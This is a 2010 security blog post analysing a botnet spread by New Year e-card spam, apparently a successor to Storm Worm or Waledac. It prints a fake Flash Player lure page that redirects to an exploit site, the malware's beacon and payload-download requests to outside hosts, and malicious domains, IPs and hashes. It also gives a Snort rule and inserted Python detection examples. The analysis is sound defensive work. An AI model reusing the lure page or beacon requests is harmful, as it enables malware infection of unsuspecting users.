
Thursday, 30 December 2010

New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0?

Those of us here at Shadowserver hope you're having a wonderful holiday season and are ready to bring in the new year. We were trying to relax and enjoy relatively quiet times until we noticed a new spam campaign that recently started. At first it looked like your regular old holiday e-card scams that have been around for years. However, upon closer inspection it looks like we could be dealing with the next generation of Storm Worm or Waledac. If you consider Waledac to be Storm Worm 2.0, this looks like it could be version 3.0 or at least Waledac 2.0. There are no real version numbers of course, but we don't have anything else to call it yet. What's it involve you ask? Well here's the list of what we've seen so far:

* Large scale Spam campaigns sending out e-mails with links
* New malicious domains that are fast flux! (TTL of 0 and name servers that frequently update IPs)
* Links are to several hacked websites hosting HTML pages that refresh to new malicious domains
* Links are also directly to new malicious domains
* Malicious domains hosting links to fake flash player and refreshes to exploit pages
* Malware installs that begin beaconing to several hosts over HTTP (what we dubbed HTTP2p with Waledac)
* Malware that's been updated to look a bit more legitimate than past variants
* A very buggy network that is not often available (upstream devices not available)
* Changing/Updated binaries

Spam Campaign

Let's start with the Spam Campaign. We've seen a multitude of subject lines and bodies. Below you'll find a list of subjects we've seen and an example e-mail message. These are coming from all over the Internet with spoofed sender addresses.

	Greeting for you!
	Greeting you with heartiest New Year wishes
	Greetings to You
	Happy New Year greetings e-card is waiting for you
	Happy New Year greetings for you
	Happy New Year greetings from your friend
	Have a happy and colorful New Year!
	l want to share Greeting with you (Shadowserver note: the first letter is an L)
	New Year 2011 greetings for you
	You have a greeting card
	You have a New Year Greeting!
	You have received a greetings card
	You've got a Happy New Year Greeting Card!

The body has been pretty consistent and looks like this:

Charley has created a New Year ecard. To view this page please click here: <URL> The greeting card will be stored for you for 14 days.

There are no pretty HTML or images in the e-mail. Just simple plaintext with a URL either to a legitimate hacked website or to one of the malicious domains.

Screen shot of e-mail to hacked website (Honda Puerto Rico in this case):

Screen shot of e-mail to new malicious domain:

Malicious Websites & Domains

If you visit one of the HTML files hosted on a compromised website, its source will look something like this:

	<meta http-equiv='refresh' content='0;url=hxxp://leolati.com' />

This will redirect you to one of the new malicious domains being used by the botnet. These are fast flux domains that will frequently return a new IP address each time they are resolved.

$ dig leolati.com A +noall +answer
leolati.com. 0 IN A 201.214.172.20

As you can see the A record has a TTL of 0, which essentially instructs name servers not to cache the result. Continually resolving the hostname will return several new IP addresses, just like previously seen with Storm Worm and Waledac. The example below shows what happens if you resolve the domain 4 times in 2 seconds:

$ dig leolati.com +short
24.210.159.3
$ dig leolati.com +short
84.52.32.219
$ dig leolati.com +short
109.87.127.13
$ dig leolati.com +short
91.122.36.192
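An added example, not code from the post, that turns the check described above into something repeatable: it parses dig "+noall +answer" lines for a name resolved several times and flags the name when the TTL stays at or below a ceiling while the answers spread over several distinct IPs and /16 prefixes. The sample outputs are constructed from the four resolutions shown above, plus a stable name for contrast; the thresholds are assumptions.

```python
import ipaddress
import re

# Matches the "dig +noall +answer" format used in the post, e.g.
#   leolati.com. 0 IN A 201.214.172.20
ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+A\s+(\d+\.\d+\.\d+\.\d+)\s*$")

def parse_answers(text):
    """Return a list of (name, ttl, ip) tuples from dig answer output."""
    out = []
    for line in text.splitlines():
        m = ANSWER_RE.match(line.strip())
        if m:
            out.append((m.group(1).rstrip("."), int(m.group(2)), m.group(3)))
    return out

def fast_flux_score(answers, max_ttl=60, min_ips=3, min_prefixes=2):
    """Summarise repeated resolutions of one name: highest TTL seen, distinct
    IPs, distinct /16 prefixes and a verdict (thresholds are assumptions)."""
    ttls = [ttl for _, ttl, _ in answers]
    ips = {ip for _, _, ip in answers}
    prefixes = {str(ipaddress.ip_network(ip + "/16", strict=False)) for ip in ips}
    verdict = (bool(ttls) and max(ttls) <= max_ttl
               and len(ips) >= min_ips and len(prefixes) >= min_prefixes)
    return {"max_ttl": max(ttls) if ttls else None,
            "distinct_ips": len(ips),
            "distinct_prefixes": len(prefixes),
            "fast_flux": verdict}

# Constructed sample: the four resolutions from the post, rewritten in the
# +noall +answer format with the TTL of 0 the post reports.
FLUX_OUTPUT = """\
leolati.com. 0 IN A 24.210.159.3
leolati.com. 0 IN A 84.52.32.219
leolati.com. 0 IN A 109.87.127.13
leolati.com. 0 IN A 91.122.36.192
"""
# Constructed sample of a normally cached, single-address name for contrast.
STABLE_OUTPUT = """\
www.example.com. 3600 IN A 192.0.2.10
www.example.com. 3540 IN A 192.0.2.10
www.example.com. 3500 IN A 192.0.2.10
"""

if __name__ == "__main__":
    print(fast_flux_score(parse_answers(FLUX_OUTPUT)))
    print(fast_flux_score(parse_answers(STABLE_OUTPUT)))
```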

We have been investigating these new domains from e-mail messages, passive DNS, and other sources and have found the following domains so far to be part of this new botnet:


We also found what appears to be a different but closely linked domain that should likely be blocked or monitored for as well:

eplarine.com

Malware & Exploits

The whole point of this botnet is to install malware onto the systems of unsuspecting visitors. It appears to do this in two ways. The first is through social engineering, by tricking the visitor into installing a fake Flash Player. The screen shot below shows what is presented when visitors follow a link sent out in the spam campaign.

The link goes right to install_flash_player.exe. The visitor has 5 seconds to click this link before the meta refresh in the page source sends the browser to an exploit site. The source of the website looks like this:

	<html>
	<head>
	<title>Oops, this page requires Flash.</title>
	<meta http-equiv="Refresh" content="5; url=hxxp://staticweb.co.cc/user/index.php?bid=165&rnd=enabled&offset=1&search=temp123&pool=on">
	</head>
	<body bgcolor="white" text="black">
	<br>
	<center>Can't view this greeting? <a href="install_flash_player.exe" target="_blank">Download Flash Player!</a></center>
	</body>
	</html>

If the user downloads and installs "install_flash_player.exe", the system will immediately begin connecting to different IP addresses over port 80. The malware will make GET requests like the one seen below.

	GET /fOnoxXpVU2wPFUMq.htm HTTP/1.1
	Host: 77.122.1.250
	Content-Length: 306
	User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)

The requests do have Content-Length fields and include encoded data after the bogus Internet Explorer 8.0 User-Agent. As you may have noticed, this is a GET request with data contained where one would normally find payload for a POST request.

We have observed several different domains used for this URL, all of which are under the free-to-register .co.cc domain. Each of these domains also appears to be hosted on a single Ukrainian IP address, 91.204.48.50. We would recommend blocking access to this IP address. These sites appear to fire a few different exploits at the user and will make a GET request to /get/exe.php?x=<exploit tag>, where <exploit tag> identifies which exploit was successful. The server will respond with the executable, which writes itself as knockout.exe in the user's Temp directory.

After that it does all kinds of beaconing and makes connections to other unrelated malware websites. Of specific note and interest are two other things it does.

The knockout.exe malware uses the User-Agent Opera/9.80 Pesto/2.2.15 on multiple occasions. One of the first things it does is make the following request to adobe.com:

	POST /geo/productid.php HTTP/1.1
	Host: adobe.com
	User-Agent: Opera/9.80 Pesto/2.2.15
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 20

	id=_6_244_1009707083

The next thing it does is attempt to install the new Storm Worm 3.0 trojan onto the system by making the following request to darlev.com:

	GET /flash2.exe HTTP/1.0
	Host: darlev.com

The last successful grab of install_flash_player.exe that we got had the following details:

	Filename: install_flash_player.exe
	File size: 485888 bytes
	MD5 hash: 58e718e9b9c76330154d4f693b50d50e
	SHA-1 hash: 50add894f5ccc6bbbf0a00b01952605e1256f990
	SHA-256 hash: a7f431309ef5fbe37516153ffd35f1b3475af91f57d9543b724ca53139cd8cae
	ssdeep: 12288:FLc4mNmApKRkvpAbFl6GAC9f8Qrv4uNNbloFg+9l:FzNkvE/8C9UQrv4uTblRql

Detection

Detecting this activity is not too difficult. The first thing you can start with is the domain names above and the malicious IP we listed related to the exploit website. We tested a Snort signature that we found to be fairly reliable at detecting the new beaconing activity. The static User-Agent string, Content-Length field with a GET request, and the beginning of the payload make for fairly easy detection with the below signature.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Waledac 2.0/Storm Worm 3.0 GET request detected"; flow:established; content:"GET /"; depth:5; content:"|0d0a|Content-Length: "; within:75; content:"|0d0a|User-Agent: Mozilla/4.0 (compatible|3b| MSIE 8.0|3b| Windows NT 6.1|3b| Trident/4.0)|0d0a|"; content:"|0102010101010201|"; within:10; sid:20102011;)
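The same three conditions the Snort rule keys on, written out as a standalone check over raw HTTP requests (an added example for this post, not Shadowserver's code): "GET /" at the start, a Content-Length header within 75 bytes of it, the fixed MSIE 8.0 User-Agent line, and the 8-byte payload prefix ending within 10 bytes of that line. The sample requests are constructed from the request shown earlier; the encoded body beyond its prefix is invented.

```python
GET_PREFIX = b"GET /"
CONTENT_LENGTH = b"\r\nContent-Length: "
BOGUS_UA = (b"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; "
            b"Windows NT 6.1; Trident/4.0)\r\n")
# content:"|0102010101010201|" from the Snort rule above
PAYLOAD_PREFIX = bytes.fromhex("0102010101010201")

def is_storm3_beacon(raw: bytes) -> bool:
    """Return True when a raw HTTP request matches the beaconing pattern."""
    # content:"GET /"; depth:5
    if not raw.startswith(GET_PREFIX):
        return False
    # content:"|0d0a|Content-Length: "; within:75 -> the header must lie
    # entirely within the 75 bytes that follow the "GET /" match.
    start = len(GET_PREFIX)
    if raw.find(CONTENT_LENGTH, start, start + 75) < 0:
        return False
    ua_at = raw.find(BOGUS_UA)
    if ua_at < 0:
        return False
    # content:"|0102010101010201|"; within:10 -> the prefix must end within
    # 10 bytes after the User-Agent line (the blank line takes 2 of them).
    ua_end = ua_at + len(BOGUS_UA)
    return raw.find(PAYLOAD_PREFIX, ua_end, ua_end + 10) >= 0

# Constructed sample modelled on the beacon shown in the post; the body
# after the 8-byte prefix is filler, not captured data.
SAMPLE_BEACON = (
    b"GET /fOnoxXpVU2wPFUMq.htm HTTP/1.1\r\n"
    b"Host: 77.122.1.250\r\n"
    b"Content-Length: 306\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    b"\r\n" + PAYLOAD_PREFIX + b"\x00" * 20
)
# Constructed ordinary browser request with the same User-Agent but no
# Content-Length and no body: must not fire.
SAMPLE_BENIGN = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("beacon:", is_storm3_beacon(SAMPLE_BEACON))
    print("benign:", is_storm3_beacon(SAMPLE_BENIGN))
```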

Stability Issues

The new Storm Worm 3.0 network has proven to be pretty unstable. The botnet has been repeatedly returning 503 Service Unavailable for most requests throughout the day. This includes both bot beaconing and requests for the fake greeting card website. We've only been able to successfully download the malware from the network a few times today. We have also observed the entire network, including fast flux DNS resolution, being intermittently offline.

Conclusion

We have not done any analysis to see if there are actually any pieces of the code that were directly taken or updated from the Storm Worm or Waledac code. However, whether or not the code is the same, this appears to be the next generation of Storm Worm and Waledac. We are just saying it could be Storm Worm 3.0, at least until someone gives it a better name.

It's also worth noting that almost 2 years ago to the day, we posted a blog about the real emergence of Waledac. If you take a look at the screen shot of the e-mail that was sent out in that post, you will see it's very similar to the ones posted above. Additionally, the URL format, down to the "?cardid=" parameter, is the same as well. If this isn't Storm Worm 3.0 it at least looks very close to Waledac 2.0.

Posted December 30, 2010, at 11:28 GMT by Steven Adair